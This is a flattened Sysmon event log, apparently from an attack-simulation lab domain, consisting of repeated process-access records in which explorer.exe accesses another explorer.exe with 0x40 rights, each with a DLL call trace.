16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 